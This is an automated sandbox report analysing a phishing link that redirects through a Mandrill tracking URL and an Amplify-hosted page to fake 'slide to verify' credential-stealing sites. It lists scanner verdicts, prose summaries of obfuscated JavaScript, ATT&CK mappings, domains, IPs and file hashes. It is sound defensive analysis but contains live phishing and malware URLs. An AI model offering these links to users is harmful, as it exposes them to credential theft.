Windows Analysis Report
https://mandrillapp.com/track/click/30363981/app.salesforceiq.com?p=eyJzIjoiQ21jNldfVTIxTkdJZi1NQzQ1SGE3SXJFTW1RIiwidiI6MSwicCI6IntcInVcIjozMDM2Mzk4MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2FwcC5zYWxlc2ZvcmNlaXEuY29tXFxcL3I_dD1BRndoWmYwNjV0QlFRSnRiMVFmd1A1dC0tMHZnQkowaF9lYklFcTVLRlhTWHFVWmFpNUo4

Overview

General Information

Sample URL: https://mandrillapp.com/track/click/30363981/app.salesforceiq.com?p=eyJzIjoiQ21jNldfVTIxTkdJZi1NQzQ1SGE3SXJFTW1RIiwidiI6MSwicCI6IntcInVcIjozMDM2Mzk4MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2FwcC5z
Analysis ID: 1579920

Detection

Score: 64
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
Detected suspicious crossdomain redirect
HTML page contains hidden javascript code
Stores files to the Windows start menu directory

Classification

  • System is w10x64
  • chrome.exe (PID: 3640 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 4372 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2324 --field-trial-handle=2232,i,8424609447750284658,8407064920144454549,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 1536 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://mandrillapp.com/track/click/30363981/app.salesforceiq.com?p=eyJzIjoiQ21jNldfVTIxTkdJZi1NQzQ1SGE3SXJFTW1RIiwidiI6MSwicCI6IntcInVcIjozMDM2Mzk4MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2FwcC5zYWxlc2ZvcmNlaXEuY29tXFxcL3I_dD1BRndoWmYwNjV0QlFRSnRiMVFmd1A1dC0tMHZnQkowaF9lYklFcTVLRlhTWHFVWmFpNUo4RlFTd1dycTkzR1FPbEFuczlLREd2VzRJQ2Z2eGo4WjVDSkQxUTlXdDVvME5XNWMwY0tIaXpVQWJ1YnBhT2dtS2pjVkxkaDFZWE8ybklsdFRlb2VQZ2dVTCZ0YXJnZXQ9NjMxZjQyMGVlZDEzY2EzYmNmNzdjMzI0JnVybD1odHRwczpcXFwvXFxcL21haW4uZDNxczBuMG9xdjNnN28uYW1wbGlmeWFwcC5jb21cIixcImlkXCI6XCI5ZTdkODJiNWQ0NzA0YWVhYTQ1ZjkxY2Y0ZTFmNGRiMFwiLFwidXJsX2lkc1wiOltcImY5ODQ5NWVhMjMyYTgzNjg1ODUxN2Y4ZTRiOTVjZjg4MWZlODExNmJcIl19In0" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: https://mandrillapp.com/track/click/30363981/app.salesforceiq.com?p=eyJzIjoiQ21jNldfVTIxTkdJZi1NQzQ1SGE3SXJFTW1RIiwidiI6MSwicCI6IntcInVcIjozMDM2Mzk4MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2FwcC5zYWxlc2ZvcmNlaXEuY29tXFxcL3I_dD1BRndoWmYwNjV0QlFRSnRiMVFmd1A1dC0tMHZnQkowaF9lYklFcTVLRlhTWHFVWmFpNUo4RlFTd1dycTkzR1FPbEFuczlLREd2VzRJQ2Z2eGo4WjVDSkQxUTlXdDVvME5XNWMwY0tIaXpVQWJ1YnBhT2dtS2pjVkxkaDFZWE8ybklsdFRlb2VQZ2dVTCZ0YXJnZXQ9NjMxZjQyMGVlZDEzY2EzYmNmNzdjMzI0JnVybD1odHRwczpcXFwvXFxcL21haW4uZDNxczBuMG9xdjNnN28uYW1wbGlmeWFwcC5jb21cIixcImlkXCI6XCI5ZTdkODJiNWQ0NzA0YWVhYTQ1ZjkxY2Y0ZTFmNGRiMFwiLFwidXJsX2lkc1wiOltcImY5ODQ5NWVhMjMyYTgzNjg1ODUxN2Y4ZTRiOTVjZjg4MWZlODExNmJcIl19In0 SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering
Source: https://main.d3qs0n0oqv3g7o.amplifyapp.com/ Avira URL Cloud: Label: malware
Source: https://6p205g.ar.yourtaskforce.com/favicon.ico Avira URL Cloud: Label: phishing
Source: https://6p205g.ar.yourtaskforce.com/?_js=_1 Avira URL Cloud: Label: phishing
Source: https://6p205g.ar.yourtaskforce.com/?_jd=botd Avira URL Cloud: Label: phishing

Phishing

Source: https://5mzcue1v.doc.checkiteasy.com/ Joe Sandbox AI: Page contains button: 'Slide to verify' Source: '2.2.pages.csv'
Source: https://5mzcue1v.doc.checkiteasy.com/ Joe Sandbox AI: Page contains button: 'Slide to verify' Source: '2.3.pages.csv'
Source: 1.1..script.csv Joe Sandbox AI: Detected suspicious JavaScript with source url: https://6p205g.ar.yourtaskforce.com/?_js=_1... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to potentially malicious domains. The use of obfuscated URLs and the script's ability to manipulate the DOM and submit forms on behalf of the user raise significant security concerns. While the script's purpose is not entirely clear, the combination of these risky behaviors suggests a high likelihood of malicious intent.
Source: 0.3.id.script.csv Joe Sandbox AI: Detected suspicious JavaScript with source url: https://5mzcue1v.doc.checkiteasy.com/... The provided JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution and potential data exfiltration. The use of the `atob` function to decode a heavily obfuscated string, which is then decrypted using a hardcoded key and written to the document, is a strong indicator of malicious intent. This type of behavior is commonly associated with malware or other types of malicious scripts.
Source: 2.4..script.csv Joe Sandbox AI: Detected suspicious JavaScript with source url: https://5mzcue1v.doc.checkiteasy.com/script.js... The provided JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirection to a suspicious domain. The heavily obfuscated code further raises concerns about its true intent. While the script may have a legitimate purpose, the combination of these factors suggests a high likelihood of malicious activity, warranting a high-risk score.
Source: https://5mzcue1v.doc.checkiteasy.com/HTTP Parser: Base64 decoded: OD'=& 25<SJaYRDQP[~W]xETKEEEOG!?#TKG]xETKEEENGGCXADF^E_NTMBGJaEYSE_G:R(YVJaEYSE_E^PVK^PIJLWK[JDNJU...
Source: https://5mzcue1v.doc.checkiteasy.com/ HTTP Parser: No favicon
Source: C:\Program Files\Google\Chrome\Application\chrome.exe HTTP traffic: Redirect from: mandrillapp.com to https://app.salesforceiq.com/r?t=afwhzf065tbqqjtb1qfwp5t--0vgbj0h_ebieq5kfxsxquzai5j8fqswwrq93gqolans9kdgvw4icfvxj8z5cjd1q9wt5o0nw5c0ckhizuabubpaogmkjcvldh1yxo2niltteoepggul&target=631f420eed13ca3bcf77c324&url=https://main.d3qs0n0oqv3g7o.amplifyapp.com
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: mandrillapp.com
Source: global traffic DNS traffic detected: DNS query: app.salesforceiq.com
Source: global traffic DNS traffic detected: DNS query: main.d3qs0n0oqv3g7o.amplifyapp.com
Source: global traffic DNS traffic detected: DNS query: 6p205g.ar.yourtaskforce.com
Source: global traffic DNS traffic detected: DNS query: 5mzcue1v.doc.checkiteasy.com
Source: global traffic DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic DNS traffic detected: DNS query: api.ipify.org
Source: global traffic DNS traffic detected: DNS query: logo.clearbit.com
Source: global traffic DNS traffic detected: DNS query: ipapi.co
Source: chromecache_84.2.dr, chromecache_80.2.dr String found in binary or memory: http://www.opensource.org/licenses/mit-license.php)
Source: chromecache_84.2.dr, chromecache_80.2.dr String found in binary or memory: https://fingerprint.com)
Source: chromecache_77.2.dr String found in binary or memory: https://fontawesome.com
Source: chromecache_77.2.dr String found in binary or memory: https://fontawesome.com/license/free
Source: classification engine; Classification label: mal64.win@19/40@30/12
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: unknown; Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2324 --field-trial-handle=2232,i,8424609447750284658,8407064920144454549,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown; Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://mandrillapp.com/track/click/30363981/app.salesforceiq.com?p=eyJzIjoiQ21jNldfVTIxTkdJZi1NQzQ1SGE3SXJFTW1RIiwidiI6MSwicCI6IntcInVcIjozMDM2Mzk4MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2FwcC5zYWxlc2ZvcmNlaXEuY29tXFxcL3I_dD1BRndoWmYwNjV0QlFRSnRiMVFmd1A1dC0tMHZnQkowaF9lYklFcTVLRlhTWHFVWmFpNUo4RlFTd1dycTkzR1FPbEFuczlLREd2VzRJQ2Z2eGo4WjVDSkQxUTlXdDVvME5XNWMwY0tIaXpVQWJ1YnBhT2dtS2pjVkxkaDFZWE8ybklsdFRlb2VQZ2dVTCZ0YXJnZXQ9NjMxZjQyMGVlZDEzY2EzYmNmNzdjMzI0JnVybD1odHRwczpcXFwvXFxcL21haW4uZDNxczBuMG9xdjNnN28uYW1wbGlmeWFwcC5jb21cIixcImlkXCI6XCI5ZTdkODJiNWQ0NzA0YWVhYTQ1ZjkxY2Y0ZTFmNGRiMFwiLFwidXJsX2lkc1wiOltcImY5ODQ5NWVhMjMyYTgzNjg1ODUxN2Y4ZTRiOTVjZjg4MWZlODExNmJcIl19In0"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; Process created: unknown unknown
Source: Google Drive.lnk.0.dr; LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.dr; LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.dr; LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.dr; LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.dr; LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.dr; LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window Recorder; Window detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 2 Browser Extensions | 1 Process Injection | 1 Masquerading | OS Credential Dumping | System Service Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 Registry Run Keys / Startup Folder | 1 Registry Run Keys / Startup Folder | 1 Process Injection | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | 4 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 5 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | 3 Ingress Tool Transfer | Traffic Duplication | Data Destruction |

| Source | Detection | Scanner | Label | Link |
| --- | --- | --- | --- | --- |
| https://mandrillapp.com/track/click/30363981/app.salesforceiq.com?p=eyJzIjoiQ21jNldfVTIxTkdJZi1NQzQ1SGE3SXJFTW1RIiwidiI6MSwicCI6IntcInVcIjozMDM2Mzk4MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2FwcC5zYWxlc2ZvcmNlaXEuY29tXFxcL3I_dD1BRndoWmYwNjV0QlFRSnRiMVFmd1A1dC0tMHZnQkowaF9lYklFcTVLRlhTWHFVWmFpNUo4RlFTd1dycTkzR1FPbEFuczlLREd2VzRJQ2Z2eGo4WjVDSkQxUTlXdDVvME5XNWMwY0tIaXpVQWJ1YnBhT2dtS2pjVkxkaDFZWE8ybklsdFRlb2VQZ2dVTCZ0YXJnZXQ9NjMxZjQyMGVlZDEzY2EzYmNmNzdjMzI0JnVybD1odHRwczpcXFwvXFxcL21haW4uZDNxczBuMG9xdjNnN28uYW1wbGlmeWFwcC5jb21cIixcImlkXCI6XCI5ZTdkODJiNWQ0NzA0YWVhYTQ1ZjkxY2Y0ZTFmNGRiMFwiLFwidXJsX2lkc1wiOltcImY5ODQ5NWVhMjMyYTgzNjg1ODUxN2Y4ZTRiOTVjZjg4MWZlODExNmJcIl19In0 | 0% | Avira URL Cloud | safe | |
| https://mandrillapp.com/track/click/30363981/app.salesforceiq.com?p=eyJzIjoiQ21jNldfVTIxTkdJZi1NQzQ1SGE3SXJFTW1RIiwidiI6MSwicCI6IntcInVcIjozMDM2Mzk4MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2FwcC5zYWxlc2ZvcmNlaXEuY29tXFxcL3I_dD1BRndoWmYwNjV0QlFRSnRiMVFmd1A1dC0tMHZnQkowaF9lYklFcTVLRlhTWHFVWmFpNUo4RlFTd1dycTkzR1FPbEFuczlLREd2VzRJQ2Z2eGo4WjVDSkQxUTlXdDVvME5XNWMwY0tIaXpVQWJ1YnBhT2dtS2pjVkxkaDFZWE8ybklsdFRlb2VQZ2dVTCZ0YXJnZXQ9NjMxZjQyMGVlZDEzY2EzYmNmNzdjMzI0JnVybD1odHRwczpcXFwvXFxcL21haW4uZDNxczBuMG9xdjNnN28uYW1wbGlmeWFwcC5jb21cIixcImlkXCI6XCI5ZTdkODJiNWQ0NzA0YWVhYTQ1ZjkxY2Y0ZTFmNGRiMFwiLFwidXJsX2lkc1wiOltcImY5ODQ5NWVhMjMyYTgzNjg1ODUxN2Y4ZTRiOTVjZjg4MWZlODExNmJcIl19In0 | 100% | SlashNext | Credential Stealing type: Phishing & Social Engineering | |
No Antivirus matches

| Source | Detection | Scanner | Label | Link |
| --- | --- | --- | --- | --- |
| https://fingerprint.com) | 0% | Avira URL Cloud | safe | |
| https://5mzcue1v.doc.checkiteasy.com/favicon.ico | 0% | Avira URL Cloud | safe | |
| https://5mzcue1v.doc.checkiteasy.com/image/logo.png | 0% | Avira URL Cloud | safe | |
| https://5mzcue1v.doc.checkiteasy.com/tracker.php | 0% | Avira URL Cloud | safe | |
| https://main.d3qs0n0oqv3g7o.amplifyapp.com/ | 100% | Avira URL Cloud | malware | |
| https://6p205g.ar.yourtaskforce.com/favicon.ico | 100% | Avira URL Cloud | phishing | |
| https://6p205g.ar.yourtaskforce.com/?_js=_1 | 100% | Avira URL Cloud | phishing | |
| https://5mzcue1v.doc.checkiteasy.com/script.js | 0% | Avira URL Cloud | safe | |
| https://6p205g.ar.yourtaskforce.com/?_jd=botd | 100% | Avira URL Cloud | phishing | |
| https://5mzcue1v.doc.checkiteasy.com/style.css | 0% | Avira URL Cloud | safe | |

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
| --- | --- | --- | --- | --- | --- |
| d26p066pn2w0s0.cloudfront.net | 13.227.8.64 | true | false | | high |
| ipapi.co | 172.67.69.226 | true | false | | high |
| mandrillapp.com | 15.197.175.4 | true | false | | high |
| cdnjs.cloudflare.com | 104.17.24.14 | true | false | | high |
| www.google.com | 142.250.181.68 | true | false | | high |
| api.ipify.org | 104.26.12.205 | true | false | | high |
| main.d3qs0n0oqv3g7o.amplifyapp.com | 13.227.8.104 | true | false | | unknown |
| 5mzcue1v.doc.checkiteasy.com | 135.225.111.190 | true | true | | unknown |
| 6p205g.ar.yourtaskforce.com | 135.225.111.190 | true | true | | unknown |
| apiq-apiv1-06027f9a-pb-48692342.us-west-2.elb.amazonaws.com | 44.226.126.181 | true | false | | unknown |
| app.salesforceiq.com | unknown | unknown | false | | high |
| logo.clearbit.com | unknown | unknown | false | | high |

| Name | Malicious | Antivirus Detection | Reputation |
| --- | --- | --- | --- |
| https://6p205g.ar.yourtaskforce.com/favicon.ico | false | Avira URL Cloud: phishing | unknown |
| https://logo.clearbit.com/undefined?size=400 | false | | high |
| https://5mzcue1v.doc.checkiteasy.com/ | true | | unknown |
| https://6p205g.ar.yourtaskforce.com/?_js=_1 | true | Avira URL Cloud: phishing | unknown |
| https://6p205g.ar.yourtaskforce.com/?_jd=botd | false | Avira URL Cloud: phishing | unknown |
| https://api.ipify.org/?format=json | false | | high |
| https://5mzcue1v.doc.checkiteasy.com/image/logo.png | true | Avira URL Cloud: safe | unknown |
| https://main.d3qs0n0oqv3g7o.amplifyapp.com/ | false | Avira URL Cloud: malware | unknown |
| https://6p205g.ar.yourtaskforce.com/ | true | | unknown |
| https://app.salesforceiq.com/r?t=AFwhZf065tBQQJtb1QfwP5t--0vgBJ0h_ebIEq5KFXSXqUZai5J8FQSwWrq93GQOlAns9KDGvW4ICfvxj8Z5CJD1Q9Wt5o0NW5c0cKHizUAbubpaOgmKjcVLdh1YXO2nIltTeoePggUL&target=631f420eed13ca3bcf77c324&url=https://main.d3qs0n0oqv3g7o.amplifyapp.com | false | | high |
| https://5mzcue1v.doc.checkiteasy.com/tracker.php | true | Avira URL Cloud: safe | unknown |
| https://5mzcue1v.doc.checkiteasy.com/style.css | true | Avira URL Cloud: safe | unknown |
| https://ipapi.co/json/ | false | | high |
| https://5mzcue1v.doc.checkiteasy.com/favicon.ico | true | Avira URL Cloud: safe | unknown |
| https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css | false | | high |
| https://5mzcue1v.doc.checkiteasy.com/script.js | true | Avira URL Cloud: safe | unknown |
| https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/webfonts/fa-solid-900.woff2 | false | | high |

| Name | Source | Malicious | Antivirus Detection | Reputation |
| --- | --- | --- | --- | --- |
| https://fingerprint.com) | chromecache_84.2.dr, chromecache_80.2.dr | false | Avira URL Cloud: safe | unknown |
| https://fontawesome.com | chromecache_77.2.dr | false | | high |
| http://www.opensource.org/licenses/mit-license.php) | chromecache_84.2.dr, chromecache_80.2.dr | false | | high |
| https://fontawesome.com/license/free | chromecache_77.2.dr | false | | high |

| IP | Domain | Country | ASN | ASN Name | Malicious |
| --- | --- | --- | --- | --- | --- |
| 104.17.24.14 | cdnjs.cloudflare.com | United States | 13335 | CLOUDFLARENETUS | false |
| 135.225.111.190 | 5mzcue1v.doc.checkiteasy.com | United States | 10455 | LUCENT-CIOUS | true |
| 104.26.12.205 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false |
| 15.197.175.4 | mandrillapp.com | United States | 7430 | TANDEMUS | false |
| 13.227.8.104 | main.d3qs0n0oqv3g7o.amplifyapp.com | United States | 16509 | AMAZON-02US | false |
| 104.26.9.44 | unknown | United States | 13335 | CLOUDFLARENETUS | false |
| 239.255.255.250 | unknown | Reserved | unknown | unknown | false |
| 13.227.8.64 | d26p066pn2w0s0.cloudfront.net | United States | 16509 | AMAZON-02US | false |
| 142.250.181.68 | www.google.com | United States | 15169 | GOOGLEUS | false |
| 44.226.126.181 | apiq-apiv1-06027f9a-pb-48692342.us-west-2.elb.amazonaws.com | United States | 16509 | AMAZON-02US | false |
| 172.67.69.226 | ipapi.co | United States | 13335 | CLOUDFLARENETUS | false |

| IP |
| --- |
| 192.168.2.5 |

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579920
Start date and time: 2024-12-23 15:20:04 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 3m 5s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: browseurl.jbs
Sample URL: https://mandrillapp.com/track/click/30363981/app.salesforceiq.com?p=eyJzIjoiQ21jNldfVTIxTkdJZi1NQzQ1SGE3SXJFTW1RIiwidiI6MSwicCI6IntcInVcIjozMDM2Mzk4MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2FwcC5zYWxlc2ZvcmNlaXEuY29tXFxcL3I_dD1BRndoWmYwNjV0QlFRSnRiMVFmd1A1dC0tMHZnQkowaF9lYklFcTVLRlhTWHFVWmFpNUo4RlFTd1dycTkzR1FPbEFuczlLREd2VzRJQ2Z2eGo4WjVDSkQxUTlXdDVvME5XNWMwY0tIaXpVQWJ1YnBhT2dtS2pjVkxkaDFZWE8ybklsdFRlb2VQZ2dVTCZ0YXJnZXQ9NjMxZjQyMGVlZDEzY2EzYmNmNzdjMzI0JnVybD1odHRwczpcXFwvXFxcL21haW4uZDNxczBuMG9xdjNnN28uYW1wbGlmeWFwcC5jb21cIixcImlkXCI6XCI5ZTdkODJiNWQ0NzA0YWVhYTQ1ZjkxY2Y0ZTFmNGRiMFwiLFwidXJsX2lkc1wiOltcImY5ODQ5NWVhMjMyYTgzNjg1ODUxN2Y4ZTRiOTVjZjg4MWZlODExNmJcIl19In0
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal64.win@19/40@30/12
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 172.217.21.35, 172.217.19.238, 64.233.161.84, 172.217.17.46, 199.232.214.172, 192.229.221.95, 172.217.17.35, 23.218.208.109, 13.107.246.63, 172.202.163.200
• Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com
• Not all processes where analyzed, report is missing behavior information
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: https://mandrillapp.com/track/click/30363981/app.salesforceiq.com?p=eyJzIjoiQ21jNldfVTIxTkdJZi1NQzQ1SGE3SXJFTW1RIiwidiI6MSwicCI6IntcInVcIjozMDM2Mzk4MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2FwcC5zYWxlc2ZvcmNlaXEuY29tXFxcL3I_dD1BRndoWmYwNjV0QlFRSnRiMVFmd1A1dC0tMHZnQkowaF9lYklFcTVLRlhTWHFVWmFpNUo4RlFTd1dycTkzR1FPbEFuczlLREd2VzRJQ2Z2eGo4WjVDSkQxUTlXdDVvME5XNWMwY0tIaXpVQWJ1YnBhT2dtS2pjVkxkaDFZWE8ybklsdFRlb2VQZ2dVTCZ0YXJnZXQ9NjMxZjQyMGVlZDEzY2EzYmNmNzdjMzI0JnVybD1odHRwczpcXFwvXFxcL21haW4uZDNxczBuMG9xdjNnN28uYW1wbGlmeWFwcC5jb21cIixcImlkXCI6XCI5ZTdkODJiNWQ0NzA0YWVhYTQ1ZjkxY2Y0ZTFmNGRiMFwiLFwidXJsX2lkc1wiOltcImY5ODQ5NWVhMjMyYTgzNjg1ODUxN2Y4ZTRiOTVjZjg4MWZlODExNmJcIl19In0
No simulations
No context

Process: C:\Program Files\Google\Chrome\Application\chrome.exe
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 23 13:21:02 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category: dropped
Size (bytes): 2677
Entropy (8bit): 3.9667304171328666
Encrypted: false
Malicious: false
Reputation: low

Process: C:\Program Files\Google\Chrome\Application\chrome.exe
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 23 13:21:02 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category: dropped
Size (bytes): 2679
Entropy (8bit): 3.985955954484175
Encrypted: false
Malicious: false
Reputation: low

Process: C:\Program Files\Google\Chrome\Application\chrome.exe
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category: dropped
Size (bytes): 2693
Entropy (8bit): 3.997884605401436
Encrypted: false
Malicious: false
Reputation: low

Process: C:\Program Files\Google\Chrome\Application\chrome.exe
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 23 13:21:02 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category: dropped
Size (bytes): 2681
Entropy (8bit): 3.982513685775961
Encrypted: false
Malicious: false
Reputation: low
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 23 13:21:02 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                Category:dropped
                                                Size (bytes):2681
                                                Entropy (8bit):3.9697388383759793
                                                Encrypted:false
                                                SSDEEP:48:8odmTCedHeidAKZdA1hehBiZUk1W1qehzy+C:8Znv9Ty
                                                MD5:B2EA3FA75E841E5A7C1B0DA6E48D9BEF
                                                SHA1:B41723A60DD188EEF14271989ED5917711F08648
                                                SHA-256:2B300119F1BB9C39D6271FF59670AD1265410D55201A99F82980B10F91662D4C
                                                SHA-512:5F918A7226B46D06A82A25E9C55E3EBE1AB13E1B6439BF532C81C92902809E60FA07001BA982D46F26E11AF9369C56710698687BF07A0B8D58BB0961544B7DF0
                                                Malicious:false
                                                Reputation:low
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 23 13:21:02 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                Category:dropped
                                                Size (bytes):2683
                                                Entropy (8bit):3.980984961468887
                                                Encrypted:false
                                                SSDEEP:48:8eidmTCedHeidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbNy+yT+:8e7nnT/TbxWOvTbNy7T
                                                MD5:3B3775F007605340264392AEE995130F
                                                SHA1:F09092E32B389FDF01A75AEFEBF1B38944A2E5AB
                                                SHA-256:0E3CA05EC989FEDDF24F450F8698C7FB6D71EAA86B6E14EE4277439B88CE22B8
